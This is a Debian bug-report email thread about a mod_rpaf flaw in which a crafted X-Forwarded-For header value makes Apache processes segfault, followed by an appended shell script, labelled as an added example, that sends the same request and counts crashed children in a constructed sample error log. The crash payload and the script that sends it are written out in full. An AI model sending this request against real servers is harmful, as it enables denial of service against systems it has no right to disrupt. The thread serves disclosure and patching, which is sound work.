tag 683984 +pending
thanks

On 06.08.2012 at 4:27, "Luciano Bello" <luci...@debian.org> wrote:
> Sébastien Bocahu reported to the security team:
> > (...)
> > A single request makes Apache segfault. On some of the environments I tested,
> > it even kills all Apache processes (they become zombies).

Thank you for the bug report.

> > The magic request is the following:
> >   curl -H "x-forwarded-for: 1'\"5000" -H "Host: a.vhost.example.com"
> >   reverseproxy
> >
> > Apache processes will segfault, hence a potential DoS issue.

This works for very typical setups.  Bad news.  And it looks like a ("potential",
yeah) remote hole.

> > From my experiments, version 0.6 fixes the issue (IPv6 patched or unpatched).

Yep.  Tag this as fixed for 0.6+ Debian packages.

> Please, prepare a minimal patch for stable

The "minimal" patch is to drop 030_ipv6.patch.  I can't confirm that
this bug is *not* reproducible for the 0.6 version *with* the above patch.

Can you ask the bug reporter to give details on:
-->8--
   rpaf 0.6 is available in Debian wheezy. The IPv6 patch is not applied
   though. I patched it myself and tested it on the
   same squeeze environment: there are no more segfaults.
-->8--
?
Unmodified 030_ipv6.patch still produces segfaults on 0.6+, for me.

> and contact the security team to
> update the package.

Is replying to the contacts of this bug report OK, or should I do anything else?


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
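A small reproduction and verification harness for the report above, added here as an example and not part of the bug report or the rpaf package. It wraps the reporter's exact curl request (the proxy URL and vhost name are placeholders you supply) and adds the check a practitioner wants next to it: counting Apache children that the error_log records as dying with SIGSEGV. The error_log excerpt is constructed for the example; the `child pid N exit signal Segmentation fault (11)` line is the Apache 2.2 notice format.

```shell
#!/bin/sh
# Added example, not code from the bug report or from mod_rpaf.

# Constructed Apache 2.2 error_log excerpt (sample data, not a real capture):
# three children die with SIGSEGV right after the crafted request arrives.
SAMPLE_ERROR_LOG='[Mon Aug 06 04:27:01 2012] [notice] Apache/2.2.16 (Debian) configured -- resuming normal operations
[Mon Aug 06 04:27:05 2012] [notice] child pid 12345 exit signal Segmentation fault (11)
[Mon Aug 06 04:27:05 2012] [notice] child pid 12346 exit signal Segmentation fault (11)
[Mon Aug 06 04:27:06 2012] [error] [client 10.0.0.5] File does not exist: /var/www/favicon.ico
[Mon Aug 06 04:27:07 2012] [notice] child pid 12347 exit signal Segmentation fault (11)'

# Send the reporter's request to a reverse proxy.  $1 is the proxy URL and
# $2 the vhost to put in the Host header (both hypothetical placeholders).
# Prints the HTTP status; a crashed child yields an empty reply, which curl
# reports as status 000 with exit code 52.
send_crafted_request() {
  proxy="$1"
  vhost="$2"
  curl -s -o /dev/null -w '%{http_code}' \
    -H "x-forwarded-for: 1'\"5000" \
    -H "Host: $vhost" \
    "$proxy"
}

# Count child processes that exited on SIGSEGV, reading error_log text
# from stdin.  grep -c exits 1 when nothing matches; "|| true" keeps the
# function usable under "set -e" and still prints the count (0).
count_segfault_children() {
  grep -c 'exit signal Segmentation fault (11)' || true
}

# Print the pid of every child that died with SIGSEGV, one per line.
segfaulted_pids() {
  sed -n 's/.*child pid \([0-9][0-9]*\) exit signal Segmentation fault (11).*/\1/p'
}

# Typical use against a live setup (not run here):
#   before=$(count_segfault_children < /var/log/apache2/error.log)
#   send_crafted_request http://reverseproxy/ a.vhost.example.com
#   after=$(count_segfault_children < /var/log/apache2/error.log)
#   [ "$after" -gt "$before" ] && echo "child segfaulted on the crafted request"
```

Run the before/after comparison on the same error_log rather than looking only for a non-200 status: a worker that segfaults gives an empty reply, but so do unrelated failures, and the `exit signal` line is the unambiguous record. The reporter's zombie observation is separate from this check and is seen with `ps`, not in error_log.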